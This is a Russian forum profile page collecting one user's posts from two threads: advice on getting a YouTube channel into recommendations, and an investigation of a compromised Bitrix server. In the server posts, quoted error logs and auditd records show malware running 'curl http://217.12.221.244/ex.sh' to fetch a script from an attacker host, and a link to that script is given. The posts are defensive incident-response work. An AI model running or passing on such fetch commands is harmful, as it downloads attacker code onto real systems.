sleepnow

sleepnow
Рейтинг
129
Регистрация
11.04.2009
f8d6d5
Рекомендованные видео (зацеп)

Добрый день еще раз!

За месяц мы сделали монетизацию.

Теперь каждый день при проливе с конечных заставок в стате всплывает 20-50 релевантных роликов, что очень радует. Почти никакого мусора, то есть 95% по теме.

Я правильно понимаю, что ютуб понимает о чем мой канал в этом случае?

Но почему тогда он не "цепляется"?

Удержание по каналу хорошее.

Порой с этих рекомендаций просмотры от 4 до 20 минут.

У меня есть предположение, что нейросеть анализирует вочтайм с каналов откуда был трафик (рекомендуемые эти задерги) и через некоторое время склеит.

Рекомендованные видео (зацеп)

А вы не замечали, что монетизация (включенная) - почти у всех рекомендуемых каналов? такое ощущение, что мол 1000 подписчиков и 4000 часов - сам мучайся набирай, как хочешь. А потом может быть в включенной монетой - заработаю на твоем канале и дам тебе заработать. Я про логику ютуба.

Завелся интересный зверек
netwind:
Вас поломали через битрикс или самописные модули к нему или еще какое-то веб-приложение.

Это было сотни раз и еще много раз повторится.
Слова типа докер, киссинг и майнер не имеют в этом случае никакого значения.

К чему вся эта детективная история? Полноценное расследование не окупится.
Только если вы прям вот лично готовы изучить весь админский инструментарий и заниматься этим неделями.
Вы пытаетесь по внешним проявлениям эксплуатации уязвимости определить путь внедрения, а эти вещи между собой не обязаны быть связаны.

Традиционный метод решения в нищем вебе - все удалить, погуглить какие модули имеют общеизвестные дыры, обновить и снова наполнить сайт.

---------- Добавлено 02.02.2020 в 19:17 ----------


вот это разумное предположение. И на русских форумах тоже есть.
redis не был зафайрволен? и memcached часто бывает открыт.
И все они, бывает, хранят какие-то коды или кеши используемые сайтом.

Дело в том, что в httpd логах запросов / ошибок нет ничего криминального.

Крон тоже чист. Важно понять через что взломали (как.) тогда можно будет закрыть инцидент.

Сервер, где сейчас живет зверек переносить - это + 20 дней геммороя в первую очередь же мне. А мне оно, если честно не нужно, я изолировал зверька fw туда и обратно + chattr подножки расставил. Все. он не запустится от слова никак. Я хочу разобраться через что дергают его и как.

В логах

/var/log/httpd/error_log

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:02:07 --:--:-- 0curl: (7) Failed connect to 217.12.221.244:80; Connection timed out

На сервере проверил таймеры системные и кронтабы - пусто. А это значит, что дырка через что суют есть;

Перенести данные можно всегда, но как выше говорил - для меня это обернется легким адком (( но еще есть пару серверов.. и зная, через что сломали - смог бы предотвратить это.

В теории вообще похоже, что через bitrix. Так как вирь работает от httpd (bitrix user), но.. в логах запросов httpd тишина. То есть какие-то сканеры публичные .. но ничего криминального. Там должен быть какой-то запрос содержащий curl слово.. ну а если нет - то значит что-то осталось на сервере.

---------- Добавлено 02.02.2020 в 22:16 ----------

Dreammaker:


Формально можно попробовать его обмануть и вычистить, но нет гарантии, что он запрятался где-то дальше, чем в тех местах, что описаны в этом файле.

Там ничего криминального в этом .sh нет.

Удалить два файла, убить крон. SElinux, все.

Другое дело, что подтянуть этот файл пытаются... еще и еще раз ☝ понять бы как

Завелся интересный зверек
Dreammaker:
и что там лежит? 217_12_221_244/ex.sh ?

А то не хочется лезть :) Понятно, что просто при скачке не исполниться, но все же.

https://pastebin.com/FWZ7Ji30

Завелся интересный зверек
rustelekom:
Ну скорее всего. tcpdump ещё можно попробовать. А в логах этот посетитель 193.57.40.38 куда коннектился, на какую страницу? Малвари же посетителю подсовываются, по его айпи можно покопаться в логах, на какую страницу он заходил и что за код у этой страницы.

ausearch -a 16157 -i

----

type=PROCTITLE msg=audit(01.02.2020 02:42:22.520:16157) : proctitle=curl http://217.12.221.244/ex.sh

type=PATH msg=audit(01.02.2020 02:42:22.520:16157) : item=1 name=/lib64/ld-linux-x86-64.so.2 inode=2225344 dev=fd:03 mode=file,755 ouid=root ogid=root rdev=00:00 objtype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0

type=PATH msg=audit(01.02.2020 02:42:22.520:16157) : item=0 name=/usr/bin/curl inode=50336385 dev=fd:03 mode=file,755 ouid=root ogid=root rdev=00:00 objtype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0

type=EXECVE msg=audit(01.02.2020 02:42:22.520:16157) : argc=2 a0=curl a1=http://217.12.221.244/ex.sh

type=SYSCALL msg=audit(01.02.2020 02:42:22.520:16157) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x1667000 a1=0x16672e0 a2=0x1665d60 a3=0x7ffdfa41f1a0 items=2 ppid=5645 pid=5646 auid=unset uid=bitrix gid=bitrix euid=bitrix suid=bitrix fsuid=bitrix egid=bitrix sgid=bitrix fsgid=bitrix tty=(none) ses=unset comm=curl exe=/usr/bin/curl key=susp_activity

Что скажите?

Завелся интересный зверек
rustelekom:
netstat -nap | grep 217.12.221.244
а потом по pid процесса
lsof | grep pid

даст наводку какой процесс пытается сконнектится, а также возможно и пути до подозрительных файлов покажет.

Тут ключевое слово ПЫТАЛСЯ коннектится. unhide его даже не видит. нет процесса.

перенастроил sshd (fail2ban).

aide подключил (мониторинг файлов)

auditd в параноидальный режим. в 19:02 дернулся зверек, но я толкьо в 19:15 настрройку сделал.

auditd должен фиксировать ВСЕ.

https://raw.githubusercontent.com/Neo23x0/auditd/master/audit.rules

Хороший конфиг для параиноика

---------- Добавлено 31.01.2020 в 19:42 ----------

[Fri Jan 31 19:02:04.492704 2020] [php7:notice] [pid 1523] [client 193.57.40.38:43638] PHP Deprecated: The mbstring.func_overload directive is deprecated in Unknown on line 0

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- 0:02:07 --:--:-- 0curl: (7) Failed connect to 217.12.221.244:80; Connection timed out

Я так понимаю, чт живет где-то рядом с вебсервером?

Рекомендованные видео (зацеп)
Антон101:
Как быть если и о тех и других? а разве канал в целом ютуб рассматривает? есть видео которые стрельнули и на этом же канале которые мёртвые, старые, трастовые каналы не в счёт - там по рекомендованным, вначале хоть как покажет

Присоединяюсь к Антону и дополню вопрос.. поправьте, но вроде бы..

ютуб определяет принадлежность в основном по 1) заголовку 2) meta данным другим (ключевые слова и описание) 3) содержание видео 4) аудиторной группы которая его смотрит (наверняка она смотрит что-то подобное).

Рекомендованные видео (зацеп)
Maxi8:
Конкуренты поделились своей аналитикой? Если нет, то скиньте ссылку где ютуб дал информацию, что нужно 60+%, а не 30 или 10.


3-6 просмотров за все время или в день? Это ни о чем. Ютуб до сих пор не понимает канал о геях у вас или о байкерах.


Время просмотра и высокий ctr по сравнению с конкурентами в нише. Второе важнее первого как по мне. Просто играть будет не долго.

Там еще на первой странице бред какой-то был, тогда решил даже не напрягать пальцы. Сейчас припекло, вы думаете что знаете все о том как работает ютуб.

>>3-6 просмотров за все время или в день? Это ни о чем. Ютуб до сих пор не понимает канал о геях у вас или о байкерах.

От части с вами согласен, НО. если выбрать аналитику "Рекомендаций" допустим за неделю. там будет 40 видеороликов как раз четко из сети, с которой мы хотим слиться. и лишь 5 не относящихся к нам, но в целом "по теме". Везде по 1-2 просмотра.

То есть ютуб как раз думаю определил о чем канал.. но не хочет пускать нас в ранжирование.

>>Там еще на первой странице бред какой-то был, тогда решил даже не напрягать пальцы. Сейчас припекло, вы думаете что знаете все о том как работает ютуб.

Зачем же так писать агрессивно. Если бы я знал, как работает ютуб я не писал бы тут и не советовался бы. 🍻 relax как говорится.

Есть пару документов pdf, которые гуляют по сети за 2016 и 2018 года. Первый, как раз, когда произошло внедрение нейросети писало 3 человека - два из них инженеры гугл. И там четко объясняется как работает нейросеть и на что она обращает внимание.

Но это все оффтоп, давайте не будем давать друг другу никаких характеристик. Всего лишь ищу помощи..

Рекомендованные видео (зацеп)
alexbondyrn:
Вариант не плохой, но дороговастенький и есть у народа смутные сомнения что после рекламы, органику не стремятся давать, вобщем тоже 50 на 50.

Именно этим и занимаемся, ведь можно выкупать дешевый трафик ;) вопрос только в том, что удержание с него меньше 30% а то, что внутри канала через кз перетекает - уже более 65+%, то есть то, что нужно.

Таргетируемся как раз только на эти каналы.

Ютубу важна вовлеченность аудитории, время нахождения и глубина просмотра / время просмотра. особенно для первой стязи.

Ведь есть 2 нейросети там.

1) Для определения кандидатов (мы ее как кажется прошли - какие-то мало-мальски рекомендуемые задерги по смешным 3-6 просмотрам есть).

2) Для ранкинга (ранжирования видео) а вот тут мы пролетаем, так как не имеем на первоначальном видео куда льем удержания более 60+%, а всего 30.

Рекомендованные видео (зацеп)
alexbondyrn:
Количество просмотров в тех видео которые хотите зацепить должно быть как у них, а лучше больше, и удержание такое ,а лучше дольше. Как этого добиться (накрутить) тут никто не знает или не палят.
Запилите часовичек по теме и тегам, только не нудный, ютуб любит часовички, раньше это работало.

Большое спасибо, единственный, кто ответил по теме.

Могу сказать, что кол-во просмотров не особо влияет. Видел сателиты в этой тематике рожденные, где сливал хозяин же сетки с КЗ по 5к ежесуточно и за неделю канал "слипался" с каруселью.

По поводу удержания мне кажется оно важно в момент зацепа только.. а потом не так важно. Своими глазами видел на ноутбуке статистику канал 2M детского в крупной сети - удержание до 30% даже на роликах миллионниках.

12345678 ...51
Всего: 508